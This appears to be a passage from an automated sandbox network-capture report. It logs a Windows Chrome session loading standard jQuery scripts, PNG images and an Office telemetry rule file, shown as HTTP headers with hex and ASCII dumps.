                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:25:24 GMT
                                                                                                                      ETag: "15e54-5eed4ead72900"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 89684
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: application/javascript
                                                                                                                      2024-12-03 07:55:22 UTC7894INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                      Data Ascii: /*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                      2024-12-03 07:55:22 UTC8000INData Raw: 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 74 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 74 29 26 26 65 2e 74 79 70 65 3d 3d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 65 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 3f 22 6c 61 62 65 6c 22 69 6e 20 65 3f 22 6c 61 62 65 6c 22 69 6e 20 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 74 7c 7c 65 2e 69 73 44 69 73 61 62 6c 65
                                                                                                                      Data Ascii: odeName.toLowerCase();return("input"===t||"button"===t)&&e.type===n}}function ge(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.parentNode?e.parentNode.disabled===t:e.disabled===t:e.isDisabled===t||e.isDisable
                                                                                                                      2024-12-03 07:55:22 UTC8000INData Raw: 76 61 72 20 72 2c 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 3d 76 21 3d 3d 6d 3f 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 3a 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 2c 63 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28 63 29 7b 69 66 28 76 29 7b 77 68 69 6c 65 28 6c 29 7b 61 3d 65 3b 77 68 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 21 31 3b 75 3d 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 7d 72 65 74 75 72 6e 21 30 7d 69
                                                                                                                      Data Ascii: var r,i,o,a,s,u,l=v!==m?"nextSibling":"previousSibling",c=e.parentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(c){if(v){while(l){a=e;while(a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return!1;u=l="only"===h&&!u&&"nextSibling"}return!0}i
                                                                                                                      2024-12-03 07:55:22 UTC8000INData Raw: 29 26 26 72 2e 73 70 65 63 69 66 69 65 64 3f 72 2e 76 61 6c 75 65 3a 6e 75 6c 6c 7d 29 2c 73 65 7d 28 43 29 3b 53 2e 66 69 6e 64 3d 64 2c 53 2e 65 78 70 72 3d 64 2e 73 65 6c 65 63 74 6f 72 73 2c 53 2e 65 78 70 72 5b 22 3a 22 5d 3d 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 53 2e 75 6e 69 71 75 65 53 6f 72 74 3d 53 2e 75 6e 69 71 75 65 3d 64 2e 75 6e 69 71 75 65 53 6f 72 74 2c 53 2e 74 65 78 74 3d 64 2e 67 65 74 54 65 78 74 2c 53 2e 69 73 58 4d 4c 44 6f 63 3d 64 2e 69 73 58 4d 4c 2c 53 2e 63 6f 6e 74 61 69 6e 73 3d 64 2e 63 6f 6e 74 61 69 6e 73 2c 53 2e 65 73 63 61 70 65 53 65 6c 65 63 74 6f 72 3d 64 2e 65 73 63 61 70 65 3b 76 61 72 20 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 5b 5d 2c 69 3d 76 6f 69 64 20 30 21 3d 3d 6e 3b
                                                                                                                      Data Ascii: )&&r.specified?r.value:null}),se}(C);S.find=d,S.expr=d.selectors,S.expr[":"]=S.expr.pseudos,S.uniqueSort=S.unique=d.uniqueSort,S.text=d.getText,S.isXMLDoc=d.isXML,S.contains=d.contains,S.escapeSelector=d.escape;var h=function(e,t,n){var r=[],i=void 0!==n;
                                                                                                                      2024-12-03 07:55:22 UTC8000INData Raw: 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 24 29 2c 53 2e 72 65 61 64 79 28 29 7d 53 2e 66 6e 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 46 2e 74 68 65 6e 28 65 29 5b 22 63 61 74 63 68 22 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 2e 72 65 61 64 79 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 29 2c 74 68 69 73 7d 2c 53 2e 65 78 74 65 6e 64 28 7b 69 73 52 65 61 64 79 3a 21 31 2c 72 65 61 64 79 57 61 69 74 3a 31 2c 72 65 61 64 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 21 30 3d 3d 3d 65 3f 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 3a 53 2e 69 73 52 65 61 64 79 29 7c 7c 28 53 2e 69 73 52 65 61 64 79 3d 21 30 29 21 3d 3d 65 26 26 30 3c 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 7c 7c 46 2e 72 65 73 6f 6c 76 65 57 69 74 68 28 45 2c 5b 53
                                                                                                                      Data Ascii: tener("load",$),S.ready()}S.fn.ready=function(e){return F.then(e)["catch"](function(e){S.readyException(e)}),this},S.extend({isReady:!1,readyWait:1,ready:function(e){(!0===e?--S.readyWait:S.isReady)||(S.isReady=!0)!==e&&0<--S.readyWait||F.resolveWith(E,[S
                                                                                                                      2024-12-03 07:55:22 UTC8000INData Raw: 20 30 29 2c 74 29 45 65 28 65 2c 73 2c 6e 2c 72 2c 74 5b 73 5d 2c 6f 29 3b 72 65 74 75 72 6e 20 65 7d 69 66 28 6e 75 6c 6c 3d 3d 72 26 26 6e 75 6c 6c 3d 3d 69 3f 28 69 3d 6e 2c 72 3d 6e 3d 76 6f 69 64 20 30 29 3a 6e 75 6c 6c 3d 3d 69 26 26 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 28 69 3d 72 2c 72 3d 76 6f 69 64 20 30 29 3a 28 69 3d 72 2c 72 3d 6e 2c 6e 3d 76 6f 69 64 20 30 29 29 2c 21 31 3d 3d 3d 69 29 69 3d 54 65 3b 65 6c 73 65 20 69 66 28 21 69 29 72 65 74 75 72 6e 20 65 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 6f 26 26 28 61 3d 69 2c 28 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 28 29 2e 6f 66 66 28 65 29 2c 61 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 67 75 69 64 3d 61 2e 67 75 69
                                                                                                                      Data Ascii: 0),t)Ee(e,s,n,r,t[s],o);return e}if(null==r&&null==i?(i=n,r=n=void 0):null==i&&("string"==typeof n?(i=r,r=void 0):(i=r,r=n,n=void 0)),!1===i)i=Te;else if(!i)return e;return 1===o&&(a=i,(i=function(e){return S().off(e),a.apply(this,arguments)}).guid=a.gui
                                                                                                                      2024-12-03 07:55:22 UTC8000INData Raw: 6e 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6e 2e 65 71 28 65 29 3b 68 26 26 28 72 5b 30 5d 3d 64 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 74 2e 68 74 6d 6c 28 29 29 29 2c 48 65 28 74 2c 72 2c 69 2c 6f 29 7d 29 3b 69 66 28 66 26 26 28 74 3d 28 65 3d 78 65 28 72 2c 6e 5b 30 5d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 21 31 2c 6e 2c 6f 29 29 2e 66 69 72 73 74 43 68 69 6c 64 2c 31 3d 3d 3d 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 74 29 2c 74 7c 7c 6f 29 29 7b 66 6f 72 28 73 3d 28 61 3d 53 2e 6d 61 70 28 79 65 28 65 2c 22 73 63 72 69 70 74 22 29 2c 44 65 29 29 2e 6c 65 6e 67 74 68 3b 63 3c 66 3b 63 2b 2b 29 75 3d 65 2c 63 21 3d 3d 70 26 26 28 75 3d 53 2e 63 6c 6f 6e 65 28 75 2c 21 30 2c 21 30 29
                                                                                                                      Data Ascii: n.each(function(e){var t=n.eq(e);h&&(r[0]=d.call(this,e,t.html())),He(t,r,i,o)});if(f&&(t=(e=xe(r,n[0].ownerDocument,!1,n,o)).firstChild,1===e.childNodes.length&&(e=t),t||o)){for(s=(a=S.map(ye(e,"script"),De)).length;c<f;c++)u=e,c!==p&&(u=S.clone(u,!0,!0)
                                                                                                                      2024-12-03 07:55:22 UTC8000INData Raw: 69 3d 74 65 2e 65 78 65 63 28 6e 29 29 26 26 69 5b 31 5d 26 26 28 6e 3d 73 65 28 65 2c 74 2c 69 29 2c 6f 3d 22 6e 75 6d 62 65 72 22 29 2c 6e 75 6c 6c 21 3d 6e 26 26 6e 3d 3d 6e 26 26 28 22 6e 75 6d 62 65 72 22 21 3d 3d 6f 7c 7c 75 7c 7c 28 6e 2b 3d 69 26 26 69 5b 33 5d 7c 7c 28 53 2e 63 73 73 4e 75 6d 62 65 72 5b 73 5d 3f 22 22 3a 22 70 78 22 29 29 2c 76 2e 63 6c 65 61 72 43 6c 6f 6e 65 53 74 79 6c 65 7c 7c 22 22 21 3d 3d 6e 7c 7c 30 21 3d 3d 74 2e 69 6e 64 65 78 4f 66 28 22 62 61 63 6b 67 72 6f 75 6e 64 22 29 7c 7c 28 6c 5b 74 5d 3d 22 69 6e 68 65 72 69 74 22 29 2c 61 26 26 22 73 65 74 22 69 6e 20 61 26 26 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 61 2e 73 65 74 28 65 2c 6e 2c 72 29 29 7c 7c 28 75 3f 6c 2e 73 65 74 50 72 6f 70 65 72 74 79 28 74 2c 6e 29 3a 6c
                                                                                                                      Data Ascii: i=te.exec(n))&&i[1]&&(n=se(e,t,i),o="number"),null!=n&&n==n&&("number"!==o||u||(n+=i&&i[3]||(S.cssNumber[s]?"":"px")),v.clearCloneStyle||""!==n||0!==t.indexOf("background")||(l[t]="inherit"),a&&"set"in a&&void 0===(n=a.set(e,n,r))||(u?l.setProperty(t,n):l
                                                                                                                      2024-12-03 07:55:22 UTC8000INData Raw: 61 6e 69 6d 2e 73 74 6f 70 28 6f 29 2c 65 3d 21 31 2c 6e 2e 73 70 6c 69 63 65 28 74 2c 31 29 29 3b 21 65 26 26 6f 7c 7c 53 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 69 29 7d 29 7d 2c 66 69 6e 69 73 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 31 21 3d 3d 61 26 26 28 61 3d 61 7c 7c 22 66 78 22 29 2c 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 59 2e 67 65 74 28 74 68 69 73 29 2c 6e 3d 74 5b 61 2b 22 71 75 65 75 65 22 5d 2c 72 3d 74 5b 61 2b 22 71 75 65 75 65 48 6f 6f 6b 73 22 5d 2c 69 3d 53 2e 74 69 6d 65 72 73 2c 6f 3d 6e 3f 6e 2e 6c 65 6e 67 74 68 3a 30 3b 66 6f 72 28 74 2e 66 69 6e 69 73 68 3d 21 30 2c 53 2e 71 75 65 75 65 28 74 68 69 73 2c 61 2c 5b 5d 29 2c 72 26 26 72 2e 73 74 6f 70 26 26 72
                                                                                                                      Data Ascii: anim.stop(o),e=!1,n.splice(t,1));!e&&o||S.dequeue(this,i)})},finish:function(a){return!1!==a&&(a=a||"fx"),this.each(function(){var e,t=Y.get(this),n=t[a+"queue"],r=t[a+"queueHooks"],i=S.timers,o=n?n.length:0;for(t.finish=!0,S.queue(this,a,[]),r&&r.stop&&r
                                                                                                                      2024-12-03 07:55:22 UTC8000INData Raw: 75 6c 74 26 26 21 31 21 3d 3d 63 2e 5f 64 65 66 61 75 6c 74 2e 61 70 70 6c 79 28 70 2e 70 6f 70 28 29 2c 74 29 7c 7c 21 56 28 6e 29 7c 7c 75 26 26 6d 28 6e 5b 64 5d 29 26 26 21 78 28 6e 29 26 26 28 28 61 3d 6e 5b 75 5d 29 26 26 28 6e 5b 75 5d 3d 6e 75 6c 6c 29 2c 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 65 64 3d 64 2c 65 2e 69 73 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 26 26 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 2c 77 74 29 2c 6e 5b 64 5d 28 29 2c 65 2e 69 73 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 26 26 66 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 2c 77 74 29 2c 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 65 64 3d 76 6f 69 64 20 30 2c 61 26 26 28 6e 5b 75 5d 3d 61
                                                                                                                      Data Ascii: ult&&!1!==c._default.apply(p.pop(),t)||!V(n)||u&&m(n[d])&&!x(n)&&((a=n[u])&&(n[u]=null),S.event.triggered=d,e.isPropagationStopped()&&f.addEventListener(d,wt),n[d](),e.isPropagationStopped()&&f.removeEventListener(d,wt),S.event.triggered=void 0,a&&(n[u]=a


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      104192.168.2.449866196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:21 UTC574OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:22 UTC297INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:21 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:25:24 GMT
                                                                                                                      ETag: "2bd8-5eed4ead72900"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 11224
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: application/javascript
                                                                                                                      2024-12-03 07:55:22 UTC7895INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 33 2e 32 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                                                                                      Data Ascii: /*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r
                                                                                                                      2024-12-03 07:55:22 UTC3329INData Raw: 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 26 26 75 28 22 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 6c 6f 61 64 27 2e 2e 2e 29 20 63 61 6c 6c 65 64 20 61 66 74 65 72 20 6c 6f 61 64 20 65 76 65 6e 74 20 6f 63 63 75 72 72 65 64 22 29 2c 48 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 73 2e 65 61 63 68 28 5b 22 6c 6f 61 64 22 2c 22 75 6e 6c 6f 61 64 22 2c 22 65 72 72 6f 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 73 2e 66 6e 5b 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 30 29 3b 72 65 74 75 72 6e 22 6c 6f 61 64 22 3d 3d 3d 74 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f
                                                                                                                      Data Ascii: ument.readyState&&u("jQuery(window).on('load'...) called after load event occurred"),H.apply(this,arguments)},s.each(["load","unload","error"],function(e,t){s.fn[t]=function(){var e=Array.prototype.slice.call(arguments,0);return"load"===t&&"string"==typeo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      105192.168.2.44986713.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:21 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:22 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:21 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 474
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                      ETag: "0x8DC582BB3F48DAE"
                                                                                                                      x-ms-request-id: 1fbe2e95-401e-0083-4bb4-43075c000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075521Z-174f7845968xlwnmhC1EWR0sv800000015fg000000004z9g
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:22 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      106192.168.2.449868196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:22 UTC623OUTGET /wp-content/uploads/2018/02/logo-COLOUR.png HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:23 UTC261INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:23 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Sun, 11 Mar 2018 14:19:09 GMT
                                                                                                                      ETag: "33ff-56723b56eb140"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 13311
                                                                                                                      Content-Type: image/png
                                                                                                                      2024-12-03 07:55:23 UTC7931INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 d0 00 00 01 7f 08 06 00 00 00 60 f5 fe 3a 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 33 a1 49 44 41 54 78 da ec dd 4f 6c 23 69 7a 1f e0 9a 9d d9 8d bd bb de 91 ed d8 58 c7 b0 87 0b e4 9f 3d 08 46 7d c8 c9 80 9a 4a 90 c3 04 30 46 3a e5 12 60 28 1f f6 38 23 dd 74 8a d4 39 f5 4d ea 39 fa 10 71 6e 39 45 da 43 30 47 b1 1b d8 4b 8c a0 35 08 06 b1 01 db cb 31 e2 c0 81 d7 5e cd 7a d7 de b5 77 77 52 1f ab 28 b1 d5 22 ab 48 56 91 f5 e7 79 00 8e a6 bb 29 b2 f8 55 51 fc d5 a7 b7 de 2f 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a e9 cd f7 3e 7a 1e df 36 8c 44 7b 7d c1 10 00 00 cc 65 33 be
                                                                                                                      Data Ascii: PNGIHDR`:tEXtSoftwareAdobe ImageReadyqe<3IDATxOl#izX=F}J0F:`(8#t9M9qn9EC0GK51^zwwR("HVy)UQ/>z6D{}e3
                                                                                                                      2024-12-03 07:55:23 UTC5380INData Raw: 58 f8 87 fc 3c 67 ef e7 ea a1 0b 15 66 f5 67 8d e7 c5 94 5e dc 1f 66 3c ee 86 19 2d a8 c4 cf d7 fe 5c 21 9a 65 84 71 1e 1a 06 04 68 56 f9 43 3e ef d9 7b c7 0f f9 42 65 5d f0 f7 68 c6 87 72 d6 07 c5 91 e1 85 5a 85 e8 4d a5 72 8b 53 0f 8d 00 4d d5 cf de d5 43 17 21 7b e1 94 71 eb ba 69 b2 66 a1 3b 5a da 41 a5 42 74 3f c7 3d 8f fc 96 6f a9 10 1d 2e de 3c 30 12 02 34 ac f2 07 fc 3c 67 ef ea a1 97 97 b7 75 dd 34 fd 02 9e 03 58 9d 10 ec 86 19 f7 09 e1 d9 04 c5 72 21 fa 34 e7 cf 47 04 68 28 2c 44 cf 73 f6 ae 1e 7a 51 d9 0b a7 dc b6 ae 9b be af c2 07 71 56 d9 cd 8e 96 76 50 99 9f af 61 92 22 4f 29 c7 fb 7e b6 ae e4 64 05 01 1a 0a fd 21 7f 1a e5 af 87 3e 37 60 0b c9 aa 7d 7e 92 f3 71 f2 dc cf 2c 34 54 e7 e7 eb 20 ca ee a2 13 c2 73 cf 60 2d 2e d4 43 c7 37 01 5a 80
                                                                                                                      Data Ascii: X<gfg^f<-\!eqhVC>{Be]hrZMrSMC!{qif;ZABt?=o.<04<gu4Xr!4Gh(,DszQqVvPa"O)~d!>7`}~q,4T s`-.C7Z


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      107192.168.2.449869196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:22 UTC624OUTGET /wp-content/uploads/2018/02/mission-blue.png HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:23 UTC259INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:23 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Sun, 11 Mar 2018 14:19:10 GMT
